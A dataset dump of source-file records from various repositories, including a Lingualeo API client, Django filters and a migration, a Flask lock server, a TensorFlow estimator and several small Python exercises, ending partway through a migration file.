blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 2
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
69
| license_type
stringclasses 2
values | repo_name
stringlengths 5
118
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
63
| visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 2.91k
686M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 23
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 213
values | src_encoding
stringclasses 30
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 2
10.3M
| extension
stringclasses 246
values | content
stringlengths 2
10.3M
| authors
listlengths 1
1
| author_id
stringlengths 0
212
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1d1ed5e5d5c7e1e261072abdc86f3a3ae34c7bb1
|
df976d2717f81ae450e7604a072888e5a8406681
|
/english/components/helpers/Lingualeo/service.py
|
247f10d19922fff14e46d81d5dd79fca99fdd2f6
|
[] |
no_license
|
andrey-ladygin-loudclear/pyhelper
|
3bddfab247a063040c945a9556c40d7f4f5ad25e
|
ad4d36cd9971ed6c8cfda4a8e6626a532cf28f51
|
refs/heads/master
| 2021-04-28T09:48:30.802463
| 2018-02-19T11:13:18
| 2018-02-19T11:13:18
| 122,050,536
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,394
|
py
|
import urllib
import urllib2
import json
from cookielib import CookieJar
class Lingualeo:
    """Minimal Lingualeo API client (Python 2: urllib/urllib2/cookielib).

    Holds a CookieJar so the session cookie obtained by auth() is reused
    by the subsequent add_word()/get_translates() calls.
    """

    def __init__(self, email, password):
        # Credentials are stored but only sent when auth() is called.
        self.email = email
        self.password = password
        self.cj = CookieJar()

    def auth(self):
        """Log in and return the decoded JSON response.

        NOTE(review): credentials travel over plain http — confirm whether
        the API supports https.
        """
        url = "http://api.lingualeo.com/api/login"
        values = {
            "email": self.email,
            "password": self.password
        }
        return self.get_content(url, values)

    def add_word(self, word, tword, context):
        """Add *word* with translation *tword* and example *context* to the user's dictionary."""
        url = "http://api.lingualeo.com/addword"
        values = {
            "word": word,
            "tword": tword,
            "context": context,
        }
        self.get_content(url, values)

    def get_translates(self, word):
        """Return a dict for the first translation of *word*.

        On any failure this returns the exception's .message attribute
        instead (Python 2 only; .message does not exist in Python 3), so
        callers must type-check the result.
        """
        url = "http://api.lingualeo.com/gettranslates?word=" + urllib.quote_plus(word)
        try:
            result = self.get_content(url, {})
            translate = result["translate"][0]
            return {
                "is_exist": translate["is_user"],
                "word": word,
                "tword": translate["value"].encode("utf-8")
            }
        except Exception as e:
            # NOTE(review): broad catch; network and schema errors are folded
            # into one string return value.
            return e.message

    def get_content(self, url, values):
        """POST *values* to *url* (sharing self.cj cookies) and decode the JSON reply."""
        data = urllib.urlencode(values)
        opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cj))
        req = opener.open(url, data)
        return json.loads(req.read())
|
[
"andrey@gmail.com"
] |
andrey@gmail.com
|
8d1f72263bb65e91c6157f313d579fcb11c7bc71
|
3fa81f1a8328bc1b4290d0a6ed20d737eefd416f
|
/LESSON_4/hw_7_lesson_4.py
|
00bddf038c8f2a9923e7a8c54519a189e726754c
|
[] |
no_license
|
EvgeniiGrigorev0/home_work-_for_lesson_2
|
86a0942b638bed0691ae34d93dc9fec1febca269
|
55d54af21d3bef237993a21bd1f5803198596de8
|
refs/heads/main
| 2023-03-08T16:51:38.626838
| 2021-02-16T10:15:20
| 2021-02-16T10:15:20
| 331,285,530
| 0
| 0
| null | 2021-02-16T10:15:22
| 2021-01-20T11:27:17
|
Python
|
UTF-8
|
Python
| false
| false
| 947
|
py
|
# 7. Implement a generator using a function with the `yield` keyword that
# produces successive values.  Calling the function must create a generator
# object, used as: for el in fact(n).  The function computes factorials, and
# the loop must print only the first n values, from 1! up to n!.
from itertools import count
from math import factorial


def fact(n):
    """Yield k! for k = 1, 2, ..., n (yields nothing when n <= 0).

    The assignment requires the call form `for el in fact(n)`; the original
    defined an argument-less infinite generator and stopped it externally.
    """
    for k in count(1):
        if k > n:
            return
        yield factorial(k)


if __name__ == '__main__':
    # Interactive part moved under the main guard so importing the module
    # (or testing fact) does not block on input().
    num = int(input('Введите до какого числа вам нужен факториал: '))
    for value in fact(num):
        print(value)
|
[
"vllljacksonlllv@gmail.com"
] |
vllljacksonlllv@gmail.com
|
9d45a3627adcd5fafdac9dfc0c4659ab89a4240b
|
cec3c2f5b67f018384c16d308a3f4ad5d3ba93af
|
/hr/filters.py
|
30dc039d0e33be3182bc6bd416b19fe23b134f4a
|
[] |
no_license
|
levenkoevgeny/amia_social
|
37bddd59c194bb1714b82b7de32982469db87723
|
32ed973e56440b90757ae2e5c52143fa3f9c7ed1
|
refs/heads/main
| 2023-08-14T05:55:25.432038
| 2021-09-27T18:54:36
| 2021-09-27T18:54:36
| 309,278,233
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,519
|
py
|
import django_filters
from institution.models import Institution, Vacancy
from social_profile.models import SocialProfile, Language, Skill
# Language-proficiency choices shared by the vacancy and profile filters:
# stored as small ints, shown with their CEFR-style labels.
LEVELS = (
    (1, 'Beginner'),
    (2, 'Pre-Intermediate'),
    (3, 'Intermediate'),
    (4, 'Upper-Intermediate'),
    (5, 'Advanced'),
    (6, 'Proficiency'),
)
class VacancyFilter(django_filters.FilterSet):
    """Filter vacancies by institution, skills, and required language/level.

    The language filters traverse the languagewithlevelvacancy relation.
    """
    institution = django_filters.ModelMultipleChoiceFilter(queryset=Institution.objects.all())
    skills = django_filters.ModelMultipleChoiceFilter(queryset=Skill.objects.all())
    language = django_filters.ModelChoiceFilter(field_name='languagewithlevelvacancy__language',
                                                queryset=Language.objects.all())
    language_level = django_filters.ChoiceFilter(field_name='languagewithlevelvacancy__level',
                                                 choices=LEVELS)

    class Meta:
        model = Vacancy
        # Only 'skills' is auto-generated from the model; the other filters
        # are declared explicitly above and remain active.
        fields = [
            'skills',
        ]
class ProfileFilter(django_filters.FilterSet):
    """Filter social profiles by skills and by language/level.

    Mirrors VacancyFilter, but traverses the languagewithlevel relation.
    """
    skills = django_filters.ModelMultipleChoiceFilter(queryset=Skill.objects.all())
    language = django_filters.ModelChoiceFilter(field_name='languagewithlevel__language',
                                                queryset=Language.objects.all())
    language_level = django_filters.ChoiceFilter(field_name='languagewithlevel__level',
                                                 choices=LEVELS)

    class Meta:
        model = SocialProfile
        # 'skills' only; language filters are declared explicitly above.
        fields = [
            'skills',
        ]
|
[
"levenko.evgeny@yandex.by"
] |
levenko.evgeny@yandex.by
|
518283948377e77df23160ba4af13072e741f671
|
ed294013f059de740560fc8228dcf39133adb659
|
/Phyton Sample Codes/20180113-Hipotenus.py
|
93dec59b07ef73df3cced1bb4aaaccec1c7e05ad
|
[] |
no_license
|
thegentdev/Python
|
382154cddcba8b71c153b515ae02f8ced0f12e2c
|
8bdeae285db4960e3356c5fdbbc482f36cb61c14
|
refs/heads/master
| 2021-09-05T17:00:09.233698
| 2018-01-29T20:30:39
| 2018-01-29T20:30:39
| 113,296,679
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,606
|
py
|
# 2 dik kenarı verilen üçgenin hipotenüsünü bulan program.
#BayMFE
import math
import sys
# Loop-control flag for the retry loop at the bottom of the file.
kontrol=True
###################################################################################################
def dikKenarAl():
    """Prompt for the two legs of a right triangle and return them as ints.

    On bad input the handler prints a message and restarts the whole flow
    by calling Hipotenus() recursively; after that inner run finishes this
    call still returns (0, 0), which the caller suppresses (it only prints
    non-zero hypotenuses).
    """
    d1 = int(0)
    d2 = int(0)
    try:
        d1 = int(input("Lütfen 1.dik kenar uzunluğunu giriniz: "))
        d2 = int(input("Lütfen 2.dik kenar uzunluğunu giriniz: "))
    except ValueError:
        print("Lütfen sadece sayı giriniz.\n")
        d1 = int(0)
        d2 = int(0)
        Hipotenus()
    except ZeroDivisionError:
        # NOTE(review): int(input()) cannot raise ZeroDivisionError or
        # UnboundLocalError here — these two handlers look unreachable.
        print("Lütfen sıfırdan farklı bir değer giriniz.\n")
        Hipotenus()
    except UnboundLocalError:
        print("Bir hata oluştu tekrar deneyiniz.\n")
        Hipotenus()
    return d1,d2
def Tekrar():
    """Ask whether to run again; exit the program on S/s, continue otherwise.

    Fixes two defects in the original:
    - it assigned a *local* `kontrol`, which had no effect on the main loop
      (declared global here);
    - on S/s it called the undefined Cıkıs(), crashing with NameError —
      replaced with a clean sys.exit() (sys is imported at the top of file).
    """
    global kontrol
    a = str(input("Yeniden denemek istiyorsanız (Y), Programı sonlandırmak için (S) tuşlayınız: "))
    if a in ("y", "Y"):
        kontrol = True
    elif a in ("s", "S"):
        sys.exit()
    else:
        # Invalid key: tell the user and re-prompt.
        print("Yanlış giriş yaptınız.\nTekrar giriniz")
        Tekrar()
def Hipotenus():
    """Read the two legs, compute the hypotenuse and print it (unless zero)."""
    legs = []
    legs.append(dikKenarAl())
    a, b = legs[0]
    hyp = math.sqrt(a ** 2 + b ** 2)
    # (0, 0) is the error-recovery sentinel from dikKenarAl: stay silent.
    if hyp != int(0):
        print(hyp)
###################################################################################################
# Entry point: greet the user, then alternate Hipotenus()/Tekrar() until the
# user chooses to quit inside Tekrar().
print("Hipotenüs hesaplama programına hoşgeldiniz.\n\n")
while kontrol == True:
    Hipotenus()
    Tekrar()
|
[
"34301812+bayMFE@users.noreply.github.com"
] |
34301812+bayMFE@users.noreply.github.com
|
70a47262417eb8338e700cb3dffe2d3c6f5780f9
|
9168edc2a50f75ef848fb44ec6203ef12f9b59b0
|
/lock_server.py
|
da75b8f5d4ec9d87079022d470842b8bcf498e1c
|
[] |
no_license
|
Anubhavj02/DistributedFileSystem
|
9b0c6e38f7934ce6fec82af942a389eaca084d7d
|
f110d08c8a63fa7b69e26a691d477464cd157ae8
|
refs/heads/master
| 2021-05-06T15:17:01.984729
| 2017-12-15T23:46:48
| 2017-12-15T23:46:48
| 113,508,065
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,210
|
py
|
import argparse
from flask import Flask
from flask import request
from flask import jsonify
import server_messages_list
app = Flask(__name__)
@app.route('/lock_server/getLockStatus', methods=['GET'])
def get_file_lock_status():
    """Return {'file_locked': bool} for the file/user given in the query string."""
    path = request.args.get('file_path')
    user = request.args.get('user_id')
    # "Locked" means somebody other than this user currently holds the lock.
    is_locked = lock_server.check_file_locked(path, user)
    response = jsonify({'file_locked': is_locked})
    response.status_code = 200
    return response
@app.route('/lock_server/lockFile', methods=['POST'])
def put_file_lock():
    """Lock or release a file for a user, driven by the JSON body.

    Body: {'file_path': ..., 'lock_file': bool, 'user_id': ...}.
    Non-JSON requests fall through and return None (original behaviour).
    """
    if request.headers['Content-Type'] == 'application/json':
        body = request.json
        target = body['file_path']
        user = body['user_id']
        if body['lock_file']:
            # Acquire (or queue on) the lock.
            status = lock_server.put_file_lock(target, user)
        else:
            # Release the lock held by this user.
            status = lock_server.file_unlocker(target, user)
        response = jsonify({'file_lock_status': status})
        response.status_code = 200
        return response
# Class for handling all the lock operations
class LockServer:
    """In-memory registry of file locks, keyed by path.

    Each locked path maps to an ordered list of user ids; the first entry
    is the current lock holder, later entries are queued behind it.
    """

    def __init__(self, server_host, server_port):
        self.host_addr = "http://" + server_host + ":" + str(server_port) + "/"
        self.host = server_host
        self.port = server_port
        # path -> [holder, waiter, waiter, ...]
        self.locked_files_list = {}

    def put_file_lock(self, file_path, user_id):
        """Register *user_id* against *file_path*; False if already registered.

        Args:
            file_path: path of the file to be locked
            user_id: user id working on the locked file
        """
        holders = self.locked_files_list.get(file_path)
        if holders is None:
            # First claim on this path: user becomes the lock holder.
            self.locked_files_list[file_path] = [user_id]
            return True
        if user_id in holders:
            # Duplicate request from the same user.
            return False
        # Queue the user behind the current holder.
        holders.append(user_id)
        return True

    def file_unlocker(self, file_path, user_id):
        """Release *file_path* if *user_id* is the current holder.

        Raises on a path that was never locked; unlocking by a non-holder
        is a silent success (returns True either way).
        """
        holders = self.locked_files_list.get(file_path)
        if holders is None:
            raise Exception(server_messages_list.FILE_UNLOCKING)
        if holders and holders[0] == user_id:
            # Drop the head of the queue; the next waiter (if any) now holds it.
            del holders[0]
        return True

    def check_file_locked(self, path, user_id):
        """True if *path* is currently locked by someone other than *user_id*."""
        for file_path, holders in self.locked_files_list.items():
            if file_path == path and holders:
                # The head of the queue is the active holder.
                return holders[0] != user_id
        return False
if __name__ == '__main__':
    # Command-line entry point: parse host/port, build the module-level lock
    # registry used by the Flask handlers, then serve (blocking).
    args_parser = argparse.ArgumentParser()
    args_parser.add_argument(
        '--server_host',
        type=str,
        default='127.0.0.1',
        help='IP of server where it is hosted'
    )
    args_parser.add_argument(
        '--server_port',
        type=int,
        default=8004,
        help='port of the server'
    )
    ARGS, unparsed = args_parser.parse_known_args()
    lock_server = LockServer(ARGS.server_host, ARGS.server_port)
    app.run(host=ARGS.server_host, port=ARGS.server_port)
|
[
"jainan@tcd.ie"
] |
jainan@tcd.ie
|
9687b8061923b77a640b2858b548b5c5094f9dbf
|
7016b8056c81f5c2d5b1a5c252b091a51a82a8a5
|
/python/sikher_splash.py
|
09f21e7a91a0b8faf8c0e4e5e114793777d39379
|
[] |
no_license
|
sikher/sikher-gurbani-searcher
|
8d649b9247fdf5a7730c7eb6103b8904dfdaa539
|
2dca582a0cac63c3b77a02ea69f51caeeaaec2ff
|
refs/heads/master
| 2016-09-02T04:46:55.360823
| 2015-03-13T21:07:01
| 2015-03-13T21:07:01
| 32,145,402
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,245
|
py
|
# -*- coding: utf8 -*-
# Module: sikher_splash.py
# Purpose: to show a splash screen on startup
# Created: Jasdeep Singh 24/09/2005
# To Do: Add Code to Show What's Loading
# Place this status text in bottom right of splash screen
import wx
# Optional speed-up: psyco was a Python 2 JIT; profile() accelerates hot code.
try:
    import psyco
    psyco.profile()
except:
    # NOTE(review): bare except silently covers more than ImportError.
    print 'Psyco not found, ignoring it'
class MySplashScreen(wx.SplashScreen):
    """
    Create a splash screen widget shown centred for a fixed duration.
    """
    def __init__(self):
        # Recipe for the splash screen; modify the variables as necessary.
        aBitmap = wx.Image(name = "SplashScreen.png").ConvertToBitmap()
        splashStyle = wx.SPLASH_CENTRE_ON_SCREEN | wx.SPLASH_TIMEOUT
        splashDuration = 3000 # milliseconds
        splashCallback = None
        # Call the base constructor with the above arguments in exactly the
        # following order.
        wx.SplashScreen.__init__(self, aBitmap, splashStyle,
                                 splashDuration, splashCallback)
        self.Bind(wx.EVT_CLOSE, self.OnExit)
        # Let pending UI events run so the splash actually paints.
        wx.Yield()

    def OnLoading(self):
        # Placeholder: per the header comment, loading status text is TODO.
        pass

    def OnExit(self, evt):
        # Hide rather than destroy, then let the default close handling run.
        self.Hide()
        evt.Skip()
if __name__ == '__main__':
    # Module is meant to be imported by the main app; no standalone behaviour.
    pass
|
[
"jasdeep@simplyspiritdesign.com"
] |
jasdeep@simplyspiritdesign.com
|
196d0fac47d59e2fb1d63ec31d2ed35843ac5a5f
|
ec930ed441f433e4043c99f1fe8423ac52fccefb
|
/passwordretry.py
|
608ef8cc2e2cca8311d0ce17448d88ec087bc58c
|
[] |
no_license
|
mickeywangweb/passwordretry
|
1fee7150cda879cf48fa59ccdb7fdf911f404e41
|
0ffe22353c02b7750db2f4891708b1b651095d78
|
refs/heads/master
| 2022-12-17T23:13:21.525898
| 2020-09-19T04:30:45
| 2020-09-19T04:30:45
| 296,782,660
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 519
|
py
|
# Password-retry program.
# The password is configured in code (NOTE(review): this comment originally
# said 'A123456', but the code below uses lowercase 'a123456').
# Give the user at most three attempts (while loop).
# On a correct entry print "login successful";
# otherwise print "wrong password! N attempts left".
password = 'a123456'
i = 3  # remaining attempts
while i > 0:
    pwd = input('請輸入密碼')
    if pwd == password:
        print('登入成功!')
        break  # leave the loop
    else:
        i = i - 1
        print('密碼錯誤!')
        if i > 0:
            print ('還有' , i, '次機會')
        else:
            # Attempts exhausted: report the account as locked.
            print('鎖帳號')
|
[
"a0958062058@gmail.com"
] |
a0958062058@gmail.com
|
079b30c78df9dd50284154e930503a009f9f941b
|
69210707f3d8c0cca93c62e5760f3b004e8b394a
|
/03.Intro_To_TensorFlow/Week_3/01.Qwiklabs_Scaling_TensorFlow_With_Cloud_AI_Platform/taxifare/trainer/model.py
|
e08eadced6f3eec1c14f8913b4f6f795c6aa1348
|
[] |
no_license
|
mujahid7292/ML_With_TensorFlow_On_GCP
|
b22285463ffabbe201f3c494ddb6b0040827f1ac
|
713a588cf8ee05dcb06ace6659953afd1079fe87
|
refs/heads/master
| 2023-04-08T09:28:06.103151
| 2020-11-19T06:17:13
| 2020-11-19T06:17:13
| 244,292,498
| 1
| 0
| null | 2023-03-25T00:11:58
| 2020-03-02T05:59:59
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 4,902
|
py
|
#!/usr/bin/env python
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import numpy as np
import shutil
# Emit INFO-level TensorFlow log messages.
tf.compat.v1.logging.set_verbosity(tf.compat.v1.logging.INFO)

# List the CSV columns, in the exact order they appear in the data files.
CSV_COLUMNS = [
    'fare_amount',
    'pickuplon',
    'pickuplat',
    'dropofflon',
    'dropofflat',
    'passengers',
    'key'
]

# Choose which column is your label.
LABEL_COLUMN = 'fare_amount'

# Per-column default values used when a CSV field is missing.
DEFAULTS = [[0.0], [-74.0], [40.0], [-74.0], [40.7], [1.0], ['nokey']]
# Create an input function that stores your data into a dataset.
def read_dataset(filename, mode, batch_size = 512):
    """Return an Estimator input_fn that reads CSV shards matching *filename*.

    Args:
        filename: glob pattern of CSV files (train or eval data paths).
        mode: tf.estimator.ModeKeys; TRAIN enables shuffling and endless repeat.
        batch_size: rows per batch (default 512).
    """
    def _input_fn():
        def decode_csv(value_column):
            # Parse one CSV line into a feature dict, popping out the label.
            columns = tf.compat.v1.decode_csv(value_column, record_defaults = DEFAULTS)
            features = dict(zip(CSV_COLUMNS, columns))
            label = features.pop(LABEL_COLUMN)
            return features, label
        # keys_to_features = {
        #     'label': tf.compat.v1.FixedLenFeature((), dtype=tf.int64),
        #     'features': tf.compat.v1.FixedLenFeature(shape=(7,), dtype=tf.float32),
        # }
        # parsed = tf.compat.v1.parse_single_example(value_column, keys_to_features)
        # my_features = {}
        # for idx, names in enumerate(CSV_COLUMNS):
        #     my_features[names] = parsed['features'][idx]
        #return my_features, parsed['label']

        # Create list of files that match the pattern.
        file_list = tf.compat.v1.gfile.Glob(filename)
        # Create dataset from the file list, one parsed example per line.
        dataset = tf.data.TextLineDataset(file_list).map(decode_csv)
        if mode == tf.estimator.ModeKeys.TRAIN:
            num_epochs = None # indefinitely
            dataset = dataset.shuffle(buffer_size = 10 * batch_size)
        else:
            num_epochs = 1 # end-of-input after this
        dataset = dataset.repeat(num_epochs).batch(batch_size)
        # NOTE(review): returning the one-shot iterator object itself is
        # unusual for a TF1 input_fn (a Dataset or iterator.get_next() is
        # typical) — confirm the Estimator accepts this.
        return tf.compat.v1.data.make_one_shot_iterator(dataset=dataset)
    return _input_fn
# Define your feature columns ('key' and the label are deliberately excluded;
# note dropofflat/dropofflon appear in a different order than in CSV_COLUMNS).
INPUT_COLUMNS = [
    tf.feature_column.numeric_column('pickuplon'),
    tf.feature_column.numeric_column('pickuplat'),
    tf.feature_column.numeric_column('dropofflat'),
    tf.feature_column.numeric_column('dropofflon'),
    tf.feature_column.numeric_column('passengers')
]
# Create a function that will augment your feature set.
def add_more_features(feats):
    """Feature-engineering hook: return the column list unchanged (for now)."""
    # Nothing to add (yet!)
    return feats
# Materialize the (currently unchanged) feature-column list for the estimator.
feature_cols = add_more_features(INPUT_COLUMNS)
# Create your serving input function so that your trained model will be able to serve predictions
def serving_input_fn():
    """Build a ServingInputReceiver with one float placeholder per input column."""
    placeholders = {
        col.name: tf.compat.v1.placeholder(tf.float32, [None])
        for col in INPUT_COLUMNS
    }
    # The raw placeholders double as the model features (no preprocessing).
    return tf.estimator.export.ServingInputReceiver(placeholders, placeholders)
# Create an estimator that we are going to train and evaluate.
def train_and_evaluate(args):
    """Train and evaluate a DNNRegressor using the settings in *args*.

    Expects args keys: output_dir, hidden_units, train_data_paths,
    train_batch_size, train_steps, eval_data_paths, eval_delay_secs,
    throttle_secs.
    """
    tf.compat.v1.summary.FileWriterCache.clear() # ensure filewriter cache is clear for TensorBoard events file
    estimator = tf.estimator.DNNRegressor(
        model_dir = args['output_dir'],
        feature_columns = feature_cols,
        hidden_units = args['hidden_units'])
    train_spec = tf.estimator.TrainSpec(
        input_fn = read_dataset(args['train_data_paths'],
                                batch_size = args['train_batch_size'],
                                mode = tf.estimator.ModeKeys.TRAIN),
        max_steps = args['train_steps'])
    # Export the latest checkpoint in SavedModel form for serving.
    exporter = tf.estimator.LatestExporter('exporter', serving_input_fn)
    eval_spec = tf.estimator.EvalSpec(
        input_fn = read_dataset(args['eval_data_paths'],
                                batch_size = 10000,
                                mode = tf.estimator.ModeKeys.EVAL),
        steps = None,
        start_delay_secs = args['eval_delay_secs'],
        throttle_secs = args['throttle_secs'],
        exporters = exporter)
    tf.estimator.train_and_evaluate(estimator, train_spec, eval_spec)
|
[
"mujahid7292@gmail.com"
] |
mujahid7292@gmail.com
|
679060941e13f1994c2a6668adbc6846b0629918
|
da5ae2fa857fd08a565a10a2858e50fc58a06eda
|
/test/hhhh.py
|
67440849807640590c2ec719e44b970788014e18
|
[] |
no_license
|
sandengjiubanv/Python_OldBoy
|
51b1488673e7e3220fd429023f4a5441a6d6b0be
|
c91636a8befe0b7843fc3f104f6e4edbd85696a4
|
refs/heads/master
| 2020-04-11T07:29:48.679959
| 2019-01-03T09:23:08
| 2019-01-03T09:23:08
| 161,611,954
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,800
|
py
|
# -*- coding: utf-8 -*-
import os

# Ask for a directory; empty input means "use the current working directory".
path1 = input("请输入目录(默认当前目录): ")
# Sub-directory names found are echoed and also written to tmp.txt.
f = open('tmp.txt', 'w')
if path1 == "":
    print("默认使用当前目录")
    path1 = os.getcwd()
    os.chdir(path1)
    print("当前目录为 : ", os.getcwd())
    list1 = os.listdir()
    print("当前目录下有文件夹:")
    for i in list1:
        path_file = os.getcwd() + "/" + str(i)
        # print(path_file)
        if os.path.isdir(path_file):
            print(i)
            f.write(i + '\n')
else:
    # NOTE(review): this branch is identical to the one above apart from the
    # path1 fixup — the listing logic could be deduplicated.
    os.chdir(path1)
    print("当前目录为 : ", os.getcwd())
    list1 = os.listdir()
    print("当前目录下有文件夹:")
    for i in list1:
        path_file = os.getcwd() + "/" + str(i)
        # print(path_file)
        if os.path.isdir(path_file):
            print(i)
            f.write(i + '\n')
f.close()
# -*- coding: utf-8 -*-
# import os,sys
#
# def file_name(file_dir):
# for root, dirs, files in os.walk(file_dir):
# print(root) #当前目录路径
# print(dirs) #当前路径下所有子目录
# print(files) #当前路径下所有非目录子文件
#
# path = "/Users/erlong/OneDrive/PycharmProjects/s9/test/"
#
# # -*- coding: utf-8 -*-
# import os, sys
# # reload(sys)
# # sys.setdefaultencoding('utf-8')
# def all_path(dirname):
# print(os.walk(dirname))
# for maindir, subdir, file_name_list in os.walk(dirname):
# for filename in file_name_list:
# print(filename)
# path = "/Users/erlong/OneDrive/PycharmProjects/s9/test/"
#
# # path="F:/项目文档/项目结算交付件/03&04&05/v1.0/审计材料/16、数据提取脚本执行/方案&脚本"
# # path="F:/项目文档/项目结算交付件/03&04&05/v1.0/审计材料16、数据提取脚本执行/tmp/"
# # all_path(path.decode('utf-8'))
#
|
[
"1611269762@qq.com"
] |
1611269762@qq.com
|
eb3ab63e64a653a8aea2f4e1b19ccec297ec586b
|
37e64df1e2c5a1c1af9b11f3050c9117dd9dcd31
|
/API-IRIS-DjangoRestFramework/iris/iris_project/admin.py
|
3396760b50a4f956e78548495ece1e7f633924d5
|
[] |
no_license
|
Daniel-Santos9/Modulo6-Trainee-Lapisco
|
d289718e3cb4010d9932d7639dc45fab51b91066
|
dcff6ca4da4b767754f43358ac0cf27007f4172e
|
refs/heads/main
| 2023-01-05T23:21:32.529169
| 2020-11-04T19:29:31
| 2020-11-04T19:29:31
| 304,893,827
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 114
|
py
|
from django.contrib import admin
from .models import Iris

# Register the Iris model so it is manageable through the Django admin site.
admin.site.register(Iris)
|
[
"daniel.ifce2@gmail.com"
] |
daniel.ifce2@gmail.com
|
a5e1caf08b0997a65f17e398f67b4dd75b35c285
|
1d4402fbc8d17191f5818815ce43e9b1eadc7a79
|
/backend/medhistorysite/patient_ill_history/migrations/0001_initial.py
|
aae93e5ff4f79a1bec14718e704fdbdccba48bbf
|
[] |
no_license
|
Lika787/DiplomaProject
|
7df8c9e706b0aa3af834dad864bcefd16f09577c
|
6a93d8e2d9493186f2295518db02075b5acd8454
|
refs/heads/master
| 2023-04-29T11:21:43.757545
| 2021-05-17T13:10:27
| 2021-05-17T13:10:27
| 331,763,467
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 16,924
|
py
|
# Generated by Django 3.1.7 on 2021-03-07 12:31
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial schema for the patient_ill_history app.

    Creates the address/patient/medical-staff tables, the national
    classifier catalogues (NationCl*), treatment sessions with their
    stages and states, the therapy/test/measurement tables, and the
    explicit many-to-many "through" models, then the unique constraints.
    """

    # First migration of this app: nothing to depend on.
    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Address',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('country', models.CharField(max_length=100)),
                ('region', models.CharField(max_length=100)),
                ('cityVillage', models.CharField(max_length=100)),
                ('street', models.CharField(max_length=100)),
                ('houseDetails', models.CharField(max_length=40)),
            ],
        ),
        migrations.CreateModel(
            name='CatalogMeasurement',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('nameMeasurement', models.CharField(max_length=100)),
                ('unitMeasurement', models.CharField(max_length=20)),
            ],
        ),
        migrations.CreateModel(
            name='ElectroUltrasoundTherapy',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('nameEus', models.CharField(max_length=60)),
                ('valueEus', models.FloatField()),
                ('unitEus', models.CharField(max_length=20)),
                ('dateEus', models.DateTimeField()),
            ],
        ),
        # Through model for LaboratoryTest <-> MedicalStaff; its FK fields
        # are added later via AddField once both sides exist.
        migrations.CreateModel(
            name='LabMedicalStaff',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
            ],
        ),
        migrations.CreateModel(
            name='MedicalStaff',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('surname', models.CharField(max_length=100)),
                ('name', models.CharField(max_length=200)),
                ('patronymic', models.CharField(max_length=100)),
                ('position', models.CharField(choices=[('doctor', 'doctor'), ('nurse', 'nurse'), ('laboratory assistant', 'laboratory assistant'), ('medical assistant', 'medical assistant')], max_length=22)),
                ('specialization', models.CharField(max_length=100)),
                ('startWork', models.DateField()),
                ('phone', models.CharField(max_length=30)),
            ],
            options={
                'unique_together': {('name', 'surname', 'specialization')},
            },
        ),
        # National classifier catalogues (code + human-readable name).
        migrations.CreateModel(
            name='NationCl025',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('codeIll', models.CharField(max_length=30)),
                ('nameIll', models.CharField(max_length=70)),
            ],
        ),
        migrations.CreateModel(
            name='NationCl026',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('codeIntervention', models.CharField(max_length=30)),
                ('nameIntervention', models.CharField(max_length=70)),
            ],
        ),
        migrations.CreateModel(
            name='NationCl027',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('codeTest', models.CharField(max_length=30)),
                ('nameTest', models.CharField(max_length=70)),
            ],
        ),
        migrations.CreateModel(
            name='NationClPill',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('codePill', models.CharField(max_length=100)),
                ('namePill', models.CharField(max_length=100)),
            ],
        ),
        migrations.CreateModel(
            name='Patient',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('surname', models.CharField(max_length=100)),
                ('name', models.CharField(max_length=200)),
                ('patronymic', models.CharField(max_length=100)),
                ('dateBirth', models.DateField(help_text='YYYY-MM-DD')),
                ('gender', models.CharField(choices=[('man', 'man'), ('woman', 'woman')], max_length=7)),
